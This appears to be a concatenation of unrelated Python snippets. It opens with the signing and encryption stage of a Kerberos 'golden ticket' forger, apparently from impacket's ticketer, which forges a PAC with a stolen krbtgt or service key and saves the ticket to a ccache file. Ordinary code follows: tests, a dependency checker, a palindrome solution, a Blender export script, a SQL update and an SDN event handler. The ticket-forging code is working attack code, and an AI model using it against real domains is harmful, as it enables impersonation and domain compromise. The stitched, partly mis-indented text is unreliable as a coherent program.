    encRepPart['endtime'] = str(encTicketPart['endtime'])
    encRepPart['starttime'] = str(encTicketPart['starttime'])
    encRepPart['renew-till'] = str(encTicketPart['renew-till'])
    encRepPart['srealm'] = self.__domain.upper()
    encRepPart['sname'] = noValue
    encRepPart['sname']['name-string'] = noValue
    encRepPart['sname']['name-string'][0] = self.__service
    if self.__domain == self.__server:
        encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
        encRepPart['sname']['name-string'][1] = self.__domain.upper()
        logging.info('\tEncAsRepPart')
    else:
        encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
        encRepPart['sname']['name-string'][1] = self.__server
        logging.info('\tEncTGSRepPart')
    return (encRepPart, encTicketPart, pacInfos)
def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
logging.info('Signing/Encrypting final ticket')
pac_count = 4
validationInfoBlob = pacInfos[PAC_LOGON_INFO]
validationInfoAlignment = (b'\x00' * self.getPadLength(len(validationInfoBlob)))
pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
pacClientInfoAlignment = (b'\x00' * self.getPadLength(len(pacClientInfoBlob)))
pacUpnDnsInfoBlob = None
pacUpnDnsInfoAlignment = None
if (PAC_UPN_DNS_INFO in pacInfos):
pac_count += 1
pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]
pacUpnDnsInfoAlignment = (b'\x00' * self.getPadLength(len(pacUpnDnsInfoBlob)))
pacAttributesInfoBlob = None
pacAttributesInfoAlignment = None
if (PAC_ATTRIBUTES_INFO in pacInfos):
pac_count += 1
pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
pacAttributesInfoAlignment = (b'\x00' * self.getPadLength(len(pacAttributesInfoBlob)))
pacRequestorInfoBlob = None
pacRequestorInfoAlignment = None
if (PAC_REQUESTOR_INFO in pacInfos):
pac_count += 1
pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
pacRequestorInfoAlignment = (b'\x00' * self.getPadLength(len(pacRequestorInfoBlob)))
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
serverChecksumAlignment = (b'\x00' * self.getPadLength(len(serverChecksumBlob)))
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
privSvrChecksumAlignment = (b'\x00' * self.getPadLength(len(privSvrChecksumBlob)))
offsetData = (8 + (len(PAC_INFO_BUFFER().getData()) * pac_count))
validationInfoIB = PAC_INFO_BUFFER()
validationInfoIB['ulType'] = PAC_LOGON_INFO
validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
validationInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + validationInfoIB['cbBufferSize']))
pacClientInfoIB = PAC_INFO_BUFFER()
pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
pacClientInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacClientInfoIB['cbBufferSize']))
pacUpnDnsInfoIB = None
if (pacUpnDnsInfoBlob is not None):
pacUpnDnsInfoIB = PAC_INFO_BUFFER()
pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO
pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)
pacUpnDnsInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacUpnDnsInfoIB['cbBufferSize']))
pacAttributesInfoIB = None
if (pacAttributesInfoBlob is not None):
pacAttributesInfoIB = PAC_INFO_BUFFER()
pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO
pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)
pacAttributesInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacAttributesInfoIB['cbBufferSize']))
pacRequestorInfoIB = None
if (pacRequestorInfoBlob is not None):
pacRequestorInfoIB = PAC_INFO_BUFFER()
pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO
pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)
pacRequestorInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacRequestorInfoIB['cbBufferSize']))
serverChecksumIB = PAC_INFO_BUFFER()
serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
serverChecksumIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + serverChecksumIB['cbBufferSize']))
privSvrChecksumIB = PAC_INFO_BUFFER()
privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
privSvrChecksumIB['Offset'] = offsetData
buffers = (validationInfoIB.getData() + pacClientInfoIB.getData())
if (pacUpnDnsInfoIB is not None):
buffers += pacUpnDnsInfoIB.getData()
if (pacAttributesInfoIB is not None):
buffers += pacAttributesInfoIB.getData()
if (pacRequestorInfoIB is not None):
buffers += pacRequestorInfoIB.getData()
buffers += (((((serverChecksumIB.getData() + privSvrChecksumIB.getData()) + validationInfoBlob) + validationInfoAlignment) + pacInfos[PAC_CLIENT_INFO_TYPE]) + pacClientInfoAlignment)
if (pacUpnDnsInfoIB is not None):
buffers += (pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment)
if (pacAttributesInfoIB is not None):
buffers += (pacAttributesInfoBlob + pacAttributesInfoAlignment)
if (pacRequestorInfoIB is not None):
buffers += (pacRequestorInfoBlob + pacRequestorInfoAlignment)
buffersTail = (((serverChecksumBlob + serverChecksumAlignment) + privSvrChecksum.getData()) + privSvrChecksumAlignment)
pacType = PACTYPE()
pacType['cBuffers'] = pac_count
pacType['Version'] = 0
pacType['Buffers'] = (buffers + buffersTail)
blobToChecksum = pacType.getData()
checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
if (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif (serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value):
keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception(('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType']))
checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
if (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value):
keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception(('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType']))
serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)
logging.info('\tPAC_SERVER_CHECKSUM')
privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])
logging.info('\tPAC_PRIVSVR_CHECKSUM')
buffersTail = (((serverChecksum.getData() + serverChecksumAlignment) + privSvrChecksum.getData()) + privSvrChecksumAlignment)
pacType['Buffers'] = (buffers + buffersTail)
authorizationData = AuthorizationData()
authorizationData[0] = noValue
authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value
authorizationData[0]['ad-data'] = pacType.getData()
authorizationData = encoder.encode(authorizationData)
encTicketPart['authorization-data'][0]['ad-data'] = authorizationData
if (logging.getLogger().level == logging.DEBUG):
logging.debug('Customized EncTicketPart')
print(encTicketPart.prettyPrint())
print('\n')
encodedEncTicketPart = encoder.encode(encTicketPart)
cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]
if (cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value):
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif (cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value):
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif (cipher.enctype == EncryptionTypes.rc4_hmac.value):
key = Key(cipher.enctype, unhexlify(self.__options.nthash))
else:
raise Exception(('Unsupported enctype 0x%x' % cipher.enctype))
logging.info('\tEncTicketPart')
cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)
kdcRep['ticket']['enc-part']['cipher'] = cipherText
kdcRep['ticket']['enc-part']['kvno'] = 2
encodedEncASRepPart = encoder.encode(encASorTGSRepPart)
if (self.__domain == self.__server):
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncASRepPart')
cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None)
else:
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncTGSRepPart')
cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None)
kdcRep['enc-part']['cipher'] = cipherText
kdcRep['enc-part']['etype'] = cipher.enctype
kdcRep['enc-part']['kvno'] = 1
if (logging.getLogger().level == logging.DEBUG):
logging.debug('Final Golden Ticket')
print(kdcRep.prettyPrint())
print('\n')
return (encoder.encode(kdcRep), cipher, sessionKey)
def saveTicket(self, ticket, sessionKey):
logging.info(('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache')))
from impacket.krb5.ccache import CCache
ccache = CCache()
if (self.__server == self.__domain):
ccache.fromTGT(ticket, sessionKey, sessionKey)
else:
ccache.fromTGS(ticket, sessionKey, sessionKey)
ccache.saveFile((self.__target.replace('/', '.') + '.ccache'))
def run(self):
(ticket, adIfRelevant) = self.createBasicTicket()
if (ticket is not None):
(encASorTGSRepPart, encTicketPart, pacInfos) = self.customizeTicket(ticket, adIfRelevant)
(ticket, cipher, sessionKey) = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos)
self.saveTicket(ticket, sessionKey) |
class Joystick(BaseJoystick):
    """Front-end joystick class that swaps itself for the backend implementation."""

    def __init__(self, disptype=settings.DISPTYPE, **args):
        # Both supported display types are served by the pygame backend.
        if disptype not in ('pygame', 'psychopy'):
            raise Exception('Unexpected disptype: {}'.format(disptype))
        from pygaze._joystick.pygamejoystick import PyGameJoystick
        self.__class__ = PyGameJoystick
        self.__class__.__init__(self, **args)


copy_docstr(BaseJoystick, Joystick)
class TestMatchIP(TestCase):
    """Tests for utils.match_ip: exact-host and CIDR-prefix matching."""

    def test_match_ip(self):
        cases = [
            ('192.168.0.1', '10.0.0.0/24', False),
            ('192.168.0.1', '192.168.0.0/24', True),
            ('192.168.0.1', '192.168.0.1', True),
            ('192.168.0.1', '10.0.0.1', False),
        ]
        for ip, spec, expected in cases:
            result = utils.match_ip(ip, spec)
            if expected:
                self.assertTrue(result)
            else:
                self.assertFalse(result)
class DEP002UnusedDependenciesFinder(ViolationsFinder):
    """Reports DEP002 violations: declared dependencies that are never imported."""

    def find(self) -> list[Violation]:
        logging.debug('\nScanning for unused dependencies...')
        violations: list[Violation] = []
        for dep in self.dependencies:
            logging.debug('Scanning module %s...', dep.name)
            if not self._is_unused(dep):
                continue
            violations.append(DEP002UnusedDependencyViolation(dep, Location(dep.definition_file)))
        return violations

    def _is_unused(self, dependency: Dependency) -> bool:
        """True when neither the package nor any of its top-level modules is imported,
        and the dependency is not on the ignore list."""
        if self._dependency_found_in_imported_modules(dependency):
            return False
        if self._any_of_the_top_levels_imported(dependency):
            return False
        if dependency.name in self.ignored_modules:
            # Unused, but explicitly silenced by configuration.
            logging.debug("Dependency '%s' found to be unused, but ignoring.", dependency.name)
            return False
        logging.debug("Dependency '%s' does not seem to be used.", dependency.name)
        return True

    def _dependency_found_in_imported_modules(self, dependency: Dependency) -> bool:
        return any(
            imported.module.package == dependency.name
            for imported in self.imported_modules_with_locations
        )

    def _any_of_the_top_levels_imported(self, dependency: Dependency) -> bool:
        if not dependency.top_levels:
            return False
        return any(
            any(imported.module.name == top_level for imported in self.imported_modules_with_locations)
            for top_level in dependency.top_levels
        )
class Solution(object):
    def longestPalindrome(self, s):
        """Return the length of the longest palindrome buildable from the letters of *s*.

        Each character contributes the largest even part of its count; if any
        character occurs an odd number of times, exactly one leftover character
        may occupy the palindrome's center.

        :param s: input string (case-sensitive)
        :return: int length of the longest constructible palindrome (0 for "")
        """
        from collections import Counter
        length = 0
        has_odd = False
        for count in Counter(s).values():
            length += count - (count % 2)  # largest even part of this count
            has_odd = has_odd or (count % 2 == 1)
        # One odd-count character can sit in the middle.
        return length + 1 if has_odd else length
class DummyPointGlyph(DummyGlyph):
    """DummyGlyph variant whose native drawing protocol is the PointPen API."""

    DrawingPen = DummyPointPen

    def appendGlyph(self, glyph):
        # Record the other glyph's outline through our point-pen recorder.
        glyph.drawPoints(self._pen)

    def getPen(self):
        # Adapt the internal point pen to the segment-pen protocol.
        return SegmentToPointPen(self._pen)

    def getPointPen(self):
        return self._pen

    def draw(self, pen):
        # Replay recorded points through a point->segment adapter.
        self.drawPoints(PointToSegmentPen(pen))

    def drawPoints(self, pointPen):
        # Each recorded command is (method name, positional args, keyword args).
        for command, args, kwargs in (self.outline or ()):
            getattr(pointPen, command)(*args, **kwargs)
def extractVertexGroup(from_path, to_path, hier_path):
    """Import an SMPL-X FBX in Blender, dump its bone hierarchy, export an OBJ.

    :param from_path: source ``.fbx`` file path
    :param to_path: destination ``.obj`` path (vertex order/groups preserved)
    :param hier_path: destination text file of ``<bone> <parent> <flag>`` rows,
        where flag 0 marks root-level bones and 1 marks deeper bones
    """
    # Ensure output directories exist; exist_ok avoids the check-then-create race
    # the original exists()/makedirs() pair had.
    for out_file in (to_path, hier_path):
        out_dir = '/'.join(out_file.split('/')[:-1])
        if out_dir:
            os.makedirs(out_dir, exist_ok=True)
    # Remove Blender's default scene objects before importing the model.
    objs = bpy.data.objects
    for default_name in ('Cube', 'Camera', 'Light'):
        objs.remove(objs[default_name], do_unlink=True)
    bpy.ops.import_scene.fbx(filepath=from_path)
    print(bpy.data.armatures.keys())
    # NOTE(review): hard-coded armature name — assumes the FBX contains the
    # female SMPL-X rig; confirm for other model variants.
    real_armature = bpy.data.armatures['SMPLX-female']
    print(real_armature.bones.keys())
    with open(hier_path, 'w') as f:
        for key in real_armature.bones.keys():
            parent = real_armature.bones[key].parent
            if parent is None:
                f.write(key + ' None 0\n')
            elif parent.name.find('root') != -1:
                # Direct child of the root bone: flag 0.
                f.write(key + ' ' + parent.name + ' 0\n')
            else:
                f.write(key + ' ' + parent.name + ' 1\n')
    bpy.ops.export_scene.obj(filepath=to_path, keep_vertex_order=True, use_vertex_groups=True)
class CopyTraits(object):
    """Assertion mixin verifying deep-copy semantics of a traits object graph.

    Expects the concrete TestCase to provide fixtures ``self.baz`` (original),
    ``self.baz2`` (its copy), plus ``self.bar2`` and ``self.foo2`` — their
    setup is not visible in this file; confirm in the subclasses that mix
    this in.
    """

    def test_baz2_s(self):
        # Scalar values are preserved by the copy.
        self.assertEqual(self.baz2.s, 'baz')
        self.assertEqual(self.baz2.s, self.baz.s)

    def test_baz2_bar_s(self):
        self.assertEqual(self.baz2.bar.s, 'bar')
        self.assertEqual(self.baz2.bar.s, self.baz.bar.s)

    def test_baz2_bar_foo_s(self):
        self.assertEqual(self.baz2.bar.foo.s, 'foo')
        self.assertEqual(self.baz2.bar.foo.s, self.baz.bar.foo.s)

    def test_baz2_shared_s(self):
        # The 'shared' object is reachable (with the same value) at every level.
        self.assertEqual(self.baz2.shared.s, 'shared')
        self.assertEqual(self.baz2.bar.shared.s, 'shared')
        self.assertEqual(self.baz2.bar.foo.shared.s, 'shared')

    def test_baz2_bar(self):
        # Nested objects are distinct copies, not aliases of the originals.
        self.assertIsNot(self.baz2.bar, None)
        self.assertIsNot(self.baz2.bar, self.bar2)
        self.assertIsNot(self.baz2.bar, self.baz.bar)

    def test_baz2_bar_foo(self):
        self.assertIsNot(self.baz2.bar.foo, None)
        self.assertIsNot(self.baz2.bar.foo, self.foo2)
        self.assertIsNot(self.baz2.bar.foo, self.baz.bar.foo)
def test_pandas_annotations():
    """Annotations attach to a DataFrame, survive slicing, and do not keep
    their owner alive (owner reads as None after deletion)."""
    data = dict(a=['foo', 'bar'], b=[1, 2])
    df1 = pd.DataFrame(data, columns=['a', 'b'])
    obj1 = Owner()
    # annotate() returns the same frame and registers a 'climetlab-0' slot
    # in the frame's _metadata.
    assert (annotate(df1, obj1, foo=42) is df1)
    assert ('climetlab-0' in df1._metadata)
    a1 = annotation(df1)
    assert (a1.get('foo') == 42)
    assert (a1.owner is obj1)
    # A derived (sliced) frame shares the very same annotation object.
    df2 = df1[(df1.b == 42)]
    a2 = annotation(df2)
    assert (a2.get('foo') == 42)
    assert (a2.owner is obj1)
    assert (a1 is a2)
    # Per the assertion below, deleting the owner makes a2.owner read as
    # None — the annotation does not keep the owner object alive.
    del obj1
    assert (a2.owner is None)
    # NOTE(review): obj3 is the Owner *class*, not an instance — presumably
    # intentional (any object may act as owner); confirm with annotate() docs.
    obj3 = Owner
    df3 = pd.DataFrame(data, columns=['a', 'b'])
    annotate(df3, obj3, bar=42)
    a3 = annotation(df3)
    # A freshly annotated frame gets its own annotation object.
    assert (a1 is not a3)
    assert ('climetlab-0' in df3._metadata)
def update_treasury_appropriation_account_agencies():
    """Relink awarding/funding toptier agencies on treasury_appropriation_account.

    The awarding agency is derived from the allocation transfer agency (ATA),
    with DoD-subsumed agency ids collapsed to the single DoD id; the funding
    agency comes from the federal-account parent-agency mapping keyed on
    (agency_identifier, main_account_code). The WHERE clause restricts the
    UPDATE to rows whose links would actually change ("is distinct from"
    treats NULLs as comparable values).

    Returns whatever execute_dml_sql returns — presumably the affected row
    count; confirm against that helper.
    """
    sql = f'''
    with
    ata_mapping as (
        select
            taa.treasury_account_identifier,
            ata.toptier_agency_id as awarding_toptier_agency_id
        from
            treasury_appropriation_account as taa
            left outer join toptier_agency as ata on
                ata.toptier_code = case
                    when taa.allocation_transfer_agency_id in {DOD_SUBSUMED_AIDS} then '{DOD_AID}'
                    else taa.allocation_transfer_agency_id
                end
    ),
    aid_mapping as (
        {FEDERAL_ACCOUNT_PARENT_AGENCY_MAPPING}
    )
    update
        treasury_appropriation_account as taa
    set
        awarding_toptier_agency_id = ata_mapping.awarding_toptier_agency_id,
        funding_toptier_agency_id = aid_mapping.parent_toptier_agency_id
    from
        ata_mapping,
        aid_mapping
    where
        ata_mapping.treasury_account_identifier = taa.treasury_account_identifier and
        aid_mapping.agency_identifier = taa.agency_id and
        aid_mapping.main_account_code = taa.main_account_code and (
            ata_mapping.awarding_toptier_agency_id is distinct from taa.awarding_toptier_agency_id or
            aid_mapping.parent_toptier_agency_id is distinct from taa.funding_toptier_agency_id
        )
    '''
    return execute_dml_sql(sql)
def test_types():
    """Exercise TypeTransformer conversions for enum/str/int/float/date/bbox types.

    NOTE(review): the date arguments below were reconstructed — the extracted
    source had its date tokens stripped (e.g. ``transform()``, ``transform('/to/')``
    and the syntactically invalid ``transform((, , ))``). The ``YYYYMMDD``
    strings restore the apparent intent; confirm against the upstream suite.
    """
    assert (TypeTransformer(None, type=EnumType(enum)).transform('a') == 'a')
    assert (TypeTransformer(None, type=EnumListType(enum)).transform('a') == ['a'])
    assert (TypeTransformer(None, type=StrType).transform(42) == '42')
    assert (TypeTransformer(None, type=StrListType).transform(42) == ['42'])
    assert (TypeTransformer(None, type=IntType).transform('42') == 42)
    assert (TypeTransformer(None, type=IntListType).transform('42') == [42])
    # '/to/' expands inclusive ranges, optionally stepped with '/by/'.
    assert (TypeTransformer(None, type=IntListType).transform('42/to/44') == [42, 43, 44])
    assert (TypeTransformer(None, type=IntListType).transform('42/to/48/by/3') == [42, 45, 48])
    assert (TypeTransformer(None, type=FloatType).transform('3.14') == 3.14)
    assert (TypeTransformer(None, type=FloatListType).transform(3.14) == [3.14])
    assert (TypeTransformer(None, type=DateType).transform('20000101') == datetime.datetime(2000, 1, 1))
    assert (TypeTransformer(None, type=DateListType).transform('20000101/to/20000103') == [datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3)])
    assert (TypeTransformer(None, type=DateListType).transform(('20000101', '20000102', '20000103')) == [datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3)])
    # Variable types reject plain integers.
    with pytest.raises(AssertionError):
        assert (TypeTransformer(None, type=VariableType('cf')).transform(42) == 0)
    with pytest.raises(AssertionError):
        assert (TypeTransformer(None, type=VariableListType('cf')).transform(42) == 0)
    assert (TypeTransformer(None, type=BoundingBoxType).transform((1, (- 1), (- 1), 1)) == BoundingBox(north=1, west=(- 1), south=(- 1), east=1))
def extractSnailtranslationWordpressCom(item):
    """Map a snailtranslation.wordpress.com feed item to a release message.

    Returns None for preview posts or items without a chapter/volume number,
    a release message when a known tag or title matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    title_lower = item['title'].lower()
    if (not (chp or vol)) or ('preview' in title_lower):
        return None
    # Tag-based series mapping.
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    # Uncategorized posts fall back to title-substring mapping.
    if item['tags'] == ['Tak Berkategori']:
        titlemap = [
            ('Its Sudden, but I came to Another World! But I hope to live Safely', "It's Sudden, but I came to Another World! But I hope to live Safely", 'translated'),
            ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'),
            ('Master of Dungeon', 'Master of Dungeon', 'oel'),
        ]
        for titlecomponent, name, tl_type in titlemap:
            if titlecomponent.lower() in title_lower:
                return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class SDNEvents():
    """Routes Poseidon rabbit-queue messages and faucet events to the SDN
    connector (``sdnc``), updating endpoint state and Prometheus metadata."""

    def __init__(self, logger, prom, sdnc):
        self.logger = logger
        # Prometheus helper: holds metrics and the runtime_callable() timing wrapper.
        self.prom = prom
        # Inbound rabbit messages (routing_key, body) land here via rabbit_callback.
        self.m_queue = queue.Queue()
        # Deferred schedule callables consumed in process().
        self.job_queue = queue.Queue()
        self.rabbits = []
        self.config = Config().get_config()
        self.sdnc = sdnc
        self.sdnc.default_endpoints()
        self.prom.update_endpoint_metadata(self.sdnc.endpoints)

    def create_message_queue(self, host, port, exchange, binding_key):
        """Connect one rabbit consumer for *binding_key* feeding self.m_queue."""
        # The while/waiting shape leaves room for retry logic; currently it
        # performs exactly one connection attempt.
        waiting = True
        while waiting:
            rabbit = Rabbit()
            rabbit.make_rabbit_connection(host, port, exchange, binding_key)
            rabbit.start_channel(self.rabbit_callback, self.m_queue)
            waiting = False
        self.rabbits.append(rabbit)

    def start_message_queues(self):
        """Subscribe to the internal poseidon topics and the faucet exchange."""
        host = self.config['FA_RABBIT_HOST']
        port = int(self.config['FA_RABBIT_PORT'])
        exchange = 'topic-poseidon-internal'
        binding_key = ['poseidon.algos.#', 'poseidon.action.#']
        self.create_message_queue(host, port, exchange, binding_key)
        exchange = self.config['FA_RABBIT_EXCHANGE']
        binding_key = [(self.config['FA_RABBIT_ROUTING_KEY'] + '.#')]
        self.create_message_queue(host, port, exchange, binding_key)

    def merge_metadata(self, new_metadata):
        """Fold tool-produced metadata into matching endpoints.

        Returns the set of endpoints whose metadata was changed.
        """
        updated = set()
        # Lookup function per metadata key type (MAC vs IPv4/IPv6 address).
        metadata_types = {'mac_addresses': self.sdnc.endpoints_by_mac, 'ipv4_addresses': self.sdnc.endpoints_by_ip, 'ipv6_addresses': self.sdnc.endpoints_by_ip}
        for (metadata_type, metadata_lookup) in metadata_types.items():
            type_new_metadata = new_metadata.get(metadata_type, {})
            for (key, data) in type_new_metadata.items():
                endpoints = metadata_lookup(key)
                if endpoints:
                    # Only the first matching endpoint receives the update.
                    endpoint = endpoints[0]
                    if (metadata_type not in endpoint.metadata):
                        endpoint.metadata[metadata_type] = defaultdict(dict)
                    if (key in endpoint.metadata[metadata_type]):
                        endpoint.metadata[metadata_type][key].update(data)
                    else:
                        endpoint.metadata[metadata_type][key] = data
                    updated.add(endpoint)
        return updated

    def format_rabbit_message(self, item, faucet_event, remove_list):
        """Dispatch one (routing_key, body) message to its handler.

        Handlers may append to *faucet_event* / *remove_list* (mutated for the
        caller). Returns (handler result dict, True) on a known routing key,
        ({}, False) otherwise.
        """
        (routing_key, my_obj) = item
        self.logger.debug('routing_key: {0} rabbit_message: {1}'.format(routing_key, my_obj))

        def handler_algos_decider(my_obj):
            # Merge tool results into endpoint metadata; un-mirror endpoints
            # whose operation is still active.
            self.logger.debug('decider value:{0}'.format(my_obj))
            tool = my_obj.get('tool', 'unknown')
            self.update_prom_var_time('last_tool_result_time', 'tool', tool)
            data = my_obj.get('data', None)
            if (isinstance(data, dict) and data):
                updated = self.merge_metadata(data)
                if updated:
                    for endpoint in updated:
                        if endpoint.operation_active():
                            self.sdnc.unmirror_endpoint(endpoint)
                    return data
            return {}

        def handler_action_ignore(my_obj):
            # Mark the named endpoints as ignored.
            for name in my_obj:
                endpoint = self.sdnc.endpoints.get(name, None)
                if endpoint:
                    endpoint.ignore = True
            return {}

        def handler_action_clear_ignored(my_obj):
            for name in my_obj:
                endpoint = self.sdnc.endpoints.get(name, None)
                if endpoint:
                    endpoint.ignore = False
            return {}

        def handler_action_change(my_obj):
            # Transition endpoints through their state machine, re-mirroring
            # when the new state keeps an operation active.
            for (name, state) in my_obj:
                endpoint = self.sdnc.endpoints.get(name, None)
                if endpoint:
                    try:
                        if endpoint.operation_active():
                            self.sdnc.unmirror_endpoint(endpoint)
                        endpoint.machine_trigger(state)
                        endpoint.p_next_state = None
                        if endpoint.operation_active():
                            self.sdnc.mirror_endpoint(endpoint)
                            self.prom.prom_metrics['ncapture_count'].inc()
                    except Exception as e:
                        self.logger.error('Unable to change endpoint {0} because: {1}'.format(endpoint.name, str(e)))
            return {}

        def handler_action_update_acls(my_obj):
            # Apply forced ACL rules to endpoints keyed by IP.
            for ip in my_obj:
                rules = my_obj[ip]
                endpoints = self.sdnc.endpoints_by_ip(ip)
                if endpoints:
                    endpoint = endpoints[0]
                    try:
                        status = Actions(endpoint, self.sdnc.sdnc).update_acls(rules_file=self.config['RULES_FILE'], endpoints=endpoints, force_apply_rules=rules)
                        if (not status):
                            self.logger.warning('Unable to apply rules: {0} to endpoint: {1}'.format(rules, endpoint.name))
                    except Exception as e:
                        self.logger.error('Unable to apply rules: {0} to endpoint: {1} because {2}'.format(rules, endpoint.name, str(e)))
            return {}

        def handler_action_remove(my_obj):
            remove_list.extend([name for name in my_obj])
            return {}

        def handler_action_remove_ignored(_my_obj):
            remove_list.extend([endpoint.name for endpoint in self.sdnc.endpoints.values() if endpoint.ignore])
            return {}

        def handler_faucet_event(my_obj):
            # Forward faucet events only when an SDN controller is attached.
            if (self.sdnc and self.sdnc.sdnc):
                faucet_event.append(my_obj)
                return my_obj
            return {}

        handlers = {'poseidon.algos.decider': handler_algos_decider, 'poseidon.action.ignore': handler_action_ignore, 'poseidon.action.clear.ignored': handler_action_clear_ignored, 'poseidon.action.change': handler_action_change, 'poseidon.action.update_acls': handler_action_update_acls, 'poseidon.action.remove': handler_action_remove, 'poseidon.action.remove.ignored': handler_action_remove_ignored, self.config['FA_RABBIT_ROUTING_KEY']: handler_faucet_event}
        handler = handlers.get(routing_key, None)
        if (handler is not None):
            ret_val = handler(my_obj)
            return (ret_val, True)
        self.logger.error('no handler for routing_key {0}'.format(routing_key))
        return ({}, False)

    def update_prom_var_time(self, var, label_name, label_value):
        """Set gauge *var* (labelled) to the current timestamp, if prom is set."""
        if self.prom:
            self.prom.prom_metrics[var].labels(**{label_name: label_value}).set(time.time())

    def handle_rabbit(self):
        """Drain the message queue; returns (event count, faucet events, removals)."""
        events = 0
        faucet_event = []
        remove_list = []
        while True:
            (found_work, rabbit_msg) = self.prom.runtime_callable(partial(self.get_q_item, self.m_queue))
            if (not found_work):
                break
            events += 1
            self.prom.runtime_callable(partial(self.format_rabbit_message, rabbit_msg, faucet_event, remove_list))
        return (events, faucet_event, remove_list)

    def ignore_rabbit(self, routing_key, body):
        """True when the SDN controller says this faucet event should be dropped."""
        if (routing_key == self.config['FA_RABBIT_ROUTING_KEY']):
            if (self.sdnc and self.sdnc.sdnc):
                if self.sdnc.sdnc.ignore_event(body):
                    return True
        return False

    def rabbit_callback(self, ch, method, _properties, body, q=None):
        """Rabbit channel callback: enqueue non-ignored messages and ack."""
        body = json.loads(body)
        self.logger.debug('got a message: {0}:{1} (qsize {2})'.format(method.routing_key, body, q.qsize()))
        if (q is not None):
            self.update_prom_var_time('last_rabbitmq_routing_key_time', 'routing_key', method.routing_key)
            if (not self.ignore_rabbit(method.routing_key, body)):
                q.put((method.routing_key, body))
        # Always ack, even for ignored messages.
        ch.basic_ack(delivery_tag=method.delivery_tag)

    def process(self, monitor):
        """Main loop: drain rabbit, apply removals/faucet events, run scheduled
